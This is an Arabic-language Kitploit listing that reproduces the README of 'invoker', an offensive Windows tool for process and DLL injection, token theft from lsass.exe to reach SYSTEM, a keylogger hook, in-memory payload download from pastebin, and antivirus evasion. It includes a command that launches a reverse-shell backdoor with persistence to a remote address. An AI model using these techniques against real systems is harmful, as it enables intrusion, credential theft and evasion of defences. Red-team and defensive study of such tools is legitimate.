Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
invoker — أداة اختبار الاختراق وتقييم مضادات الفيروسات. | Kitploit
أدوات/GitHubGitHub/ivan-sincek/invoker
تصعيد الامتيازاتتحليل الذاكرة الجنائيالاستغلالما بعد الاستغلالاختبار الاختراقتحليل الملفات الثنائيةالتعلم والتعليمالفريق الأحمرتطوير الحمولاتArchived
GitHubivan-sincek/invoker

invoker

أداة اختبار الاختراق وتقييم مضادات الفيروسات.

312826منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

المستدعي (Invoker)

أداة اختبار اختراق وتقييم مضاد للفيروسات.

مُبنية باستخدام Visual Studio Community 2022 v17.5.4 (64-bit) وتم اختبارها على نظام Windows 10 Enterprise (64-bit).

صُنعت لأغراض تعليمية. أتمنى أن تكون مفيدة!

هذا المستودع بدأت تظهر له توقيعات معروفة وليس لدي وقت لرفع ملفات تنفيذية جديدة في كل مرة، لذا يُفضل أن تقوم بتجميع هذا المشروع بنفسك.

مواقع مفيدة:

  • elastic.co
  • learn.microsoft.com
  • processhacker.sourceforge.io
  • undocumented.ntinternals.net
  • pinvoke.net

ما يجب فعله:

  • جعل عملية ghosting متوافقة مع معمارية x86 لأن NtCreateProcessEx لا تعمل بشكل جيد مع العمليات 32-bit.

خطط مستقبلية:

  • process hollowing،
  • process doppelgänging،
  • process herpaderping،
  • process ghosting،
  • المزيد من استدعاءات DLL proxying،
  • اختراق COM،
  • سكربت Python3 لتشويش كود المصدر بالكامل بشكل ثابت.

أشياء أراعيها أثناء البرمجة:

  • تبسيط كل شيء،
  • استخدام تخصيصات ديناميكية بدلاً من التخصيصات الثابتة، (أحيانًا)
  • استخدام الحد الأدنى من حقوق الوصول المطلوبة وأعلام التحكم،
  • التعامل مع/التقاط الأخطاء/الاستثناءات المحتملة،
  • تصفير وتحرير المصفوفات والذاكرة بعد الاستخدام،
  • إغلاق المؤشرات/التدفقات المفتوحة بشكل صحيح بعد الاستخدام،
  • تقليل عدد مراجع المكتبات والكائنات وما شابه بعد الاستخدام،
  • استدعاء منظف الذاكرة قبل الخروج. (غير قابل للتطبيق)

كل ما سبق سيؤدي إلى أن يكون حجم ملف PE أصغر ومعدل اكتشاف أقل.

جدول المحتويات

  • مكتبة Invoker
  • كيفية التشغيل
  • حقن البايت كود
  • إنشاء حمولة شيل عكسي
  • PowerShell
  • استدعاءات النظام المباشرة
  • إنشاء DLL بإجراء ربط (Hook)
  • الحصول على حساب النظام المحلي (NT AUTHORITY\SYSTEM)
  • صور

مكتبة Invoker

الميزات:

  • استدعاء شيلات النظام،
  • إجراء استدعاءات نظام مباشرة،
  • استخدام Windows Management Instrumentation (WMI)،
  • الاتصال بمضيف بعيد،
  • إنهاء عملية قيد التشغيل،
  • تشغيل عملية جديدة،
  • تفريغ ذاكرة عملية،
  • العبث بالصورة التنفيذية لعملية،
  • حقن البايت كود في عملية،
  • حقن DLL في عملية،
  • عرض قائمة DLLs المحملة لعملية،
  • استدعاء اختطاف DLL،
  • تثبيت إجراء ربط (Hook)،
  • تمكين صلاحيات رمز الوصول،
  • تكرار رمز الوصول لعملية وتشغيل عملية جديدة،
  • تنزيل ملف،
  • إضافة/تعديل مفتاح تسجيل،
  • جدولة مهمة،
  • عرض قائمة بمسارات الخدمات غير المقتبسة وبدء أو إيقاف أو إعادة تشغيل خدمة،
  • استبدال ملفات System32 متعددة.

تحقق من مكتبة Invoker هنا. لا تتردد في استخدامها!


بعض الميزات قد تتطلب صلاحيات إدارية.

بعض الميزات قد لا تعمل على Windows XP والإصدارات الأقدم بسبب بعض حقوق الوصول المحددة وأعلام التحكم المستخدمة.

كيفية التشغيل

قم بتشغيل Invoker_x86.exe (32-bit) أو Invoker_x64.exe (64-bit).

لأتمتة الباب الخلفي للشيل العكسي مع إضافة الاستمرارية، قم بتشغيل الأمر التالي:

root@kitploit:~
Invoker_x64.exe 192.168.8.5:9000

Invoker 32-bit يمكنه:

  • إجراء استدعاءات نظام مباشرة،
  • تفريغ ذاكرة عملية 32-bit،
  • العبث وحقن الصورة التنفيذية لعملية 32-bit في عملية 32-bit،
  • العبث وحقن الصورة التنفيذية لعملية 64-bit في عملية 64-bit،
  • حقن بايت كود 32-bit في عملية 32-bit،
  • حقن DLL 32-bit في عملية 32-bit،
  • عرض قائمة DLLs المحملة لعملية 32-bit،
  • تثبيت إجراء ربط من DLL 32-bit.

Invoker 64-bit يمكنه:

  • إجراء استدعاءات نظام مباشرة،
  • تفريغ ذاكرة عملية 32-bit،
  • تفريغ ذاكرة عملية 64-bit،
  • العبث وحقن الصورة التنفيذية لعملية 32-bit في عملية 32-bit،
  • العبث وحقن الصورة التنفيذية لعملية 64-bit في عملية 64-bit،
  • حقن بايت كود 32-bit في عملية 32-bit،
  • حقن بايت كود 64-bit في عملية 64-bit،
  • حقن DLL 32-bit في عملية 32-bit،
  • حقن DLL 64-bit في عملية 64-bit،
  • عرض قائمة DLLs المحملة لعملية 32-bit،
  • عرض قائمة DLLs المحملة لعملية 64-bit،
  • تثبيت إجراء ربط من DLL 32-bit،
  • تثبيت إجراء ربط من DLL 64-bit.

لاحظ أن كل تقنية حقن لها مزاياها وعيوبها؛ على سبيل المثال، بعض التقنيات تتطلب حقوق وصول أقل، وتستخدم طرقًا أقل اشتباهًا، إلخ، ولكنها قد تسبب على سبيل المثال تعطل العملية، أو تحتاج بعض الوقت وظروف خاصة لتنفيذ الحمولة، إلخ.

لاحظ أن بعض أدوات C2C قد لا تعمل بعد تحرير الذاكرة. في هذه الحالة، قم بتعليق دوال مثل VirtualFreeEx, NtFreeVirtualMemory، إلخ.

حقن البايت كود

ارفع الصلاحيات عن طريق حقن بايت كود في عملية ذات صلاحيات أعلى.

هذه الأداة يمكنها تنزيل محتوى ملف ثنائي في الذاكرة وحقنه في عملية قيد التشغيل. يمكنها أيضًا تحليل استجابة HTTP واستخراج الحمولة من عنصر مخصص، مثل من <invoker>payload</invoker> حيث payload هو كود ثنائي مشفر بـ Base64.

تحقق من المثال على pastebin.com/raw/xf9Trt0d.

هذا مفيد إذا كان مضاد الفيروسات يحذف باستمرار حمولاتك المحلية.

تحقق من مثال إضافي على pastebin.com/raw/iW17rCxH - حمولة مخبأة في عنصر الصورة.

ملاحظة: البايت كود المقدم غالبًا لن يعمل لديك.

استخدم ngrok لإعطاء خادم الويب المحلي عنوانًا عامًا.


لمعرفة ما إذا كانت العملية 32-bit أو 64-bit، افتح مدير المهام -> انقر على مزيد من التفاصيل -> اذهب إلى علامة التبويب التفاصيل -> انقر بزر الماوس الأيمن على أي عمود -> انقر على تحديد الأعمدة -> حدد خانة المنصة.

لمعرفة ما إذا كانت العملية تعمل بصلاحيات إدارية، حدد خانة مرتفعة.

إنشاء حمولة شيل عكسي

تعرف على كيفية إنشاء حمولة شيل عكسي من مشروعي الآخر هنا، بالإضافة إلى كيفية إعداد مستمعي Ncat و multi/handler.

قد يفشل حقن البايت كود لأن البايت كود قد يحتوي على أحرف سيئة، أو دالة خروج خاطئة، أو ترميز خاطئ؛ حقن DLL أكثر موثوقية.

PowerShell

إذا كنت ترغب في تشغيل شيل عكسي أو رباط باستخدام PowerShell من Invoker، افتح Invoker وابدأ جلسة PowerShell، ثم قم بتشغيل أي من الأوامر الأحادية السطر (من مشروعي الآخر).

استدعاءات النظام المباشرة

مكتبة استدعاءات النظام المباشرة والتجميع (assembly) تم توليدها باستخدام SysWhispers2. الشكر للمؤلف!

لتوليد نفس المكتبة والتجميع، قم بتشغيل الأمر التالي من وحدة التحكم المفضلة لديك:

root@kitploit:~
python3 syswhispers.py -f NtOpenProcess,NtClose,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,NtCreateThreadEx,NtTerminateProcess -a all -o syscalls

تحقق من الغلاف الخاص بي حول المكتبة والتجميع هنا. لا تتردد في استخدامه!

إنشاء DLL بإجراء ربط (Hook)

تحقق من DLL البسيط مع إجراء ربط هنا. سيؤدي إجراء الربط إلى استدعاء مربع رسالة عند كل إغلاق نافذة.

تحقق من إجراء ربط لوحة المفاتيح (أي مسجل ضغطات المفاتيح) هنا.

تحقق من إجراء ربط الفأرة الذي سيشغل عملية جديدة عند أول نقرة بالماوس هنا.

لا تنس إزالة جميع الآثار التي تم إنشاؤها بعد الانتهاء من الاختبار، مثل إزالة keylogger.log، إلخ.

الحصول على حساب النظام المحلي (NT AUTHORITY\SYSTEM)

اتبع هذه الخطوات البسيطة:

  1. قم بتشغيل Invoker كمسؤول.
  2. قم بتمكين جميع صلاحيات رمز الوصول.
  3. قم بتكرار رمز الوصول من على سبيل المثال Local Security Authority Subsystem Service (lsass.exe) وقم بتشغيل نسخة جديدة من Invoker.
  4. داخل نسخة Invoker الجديدة، افتح موجه الأوامر وقم بتشغيل whoami، يجب أن ترى الآن nt authority\system.
  5. قم بتمكين جميع صلاحيات رمز الوصول مرة أخرى.
  6. أغلق نسخة Invoker القديمة.

صور

Invoker

الشكل 1 - Invoker

Bytecode Injection

الشكل 2 - حقن البايت كود

Elevated Privileges

الشكل 3 - صلاحيات مرتفعة

تنزيل الأداة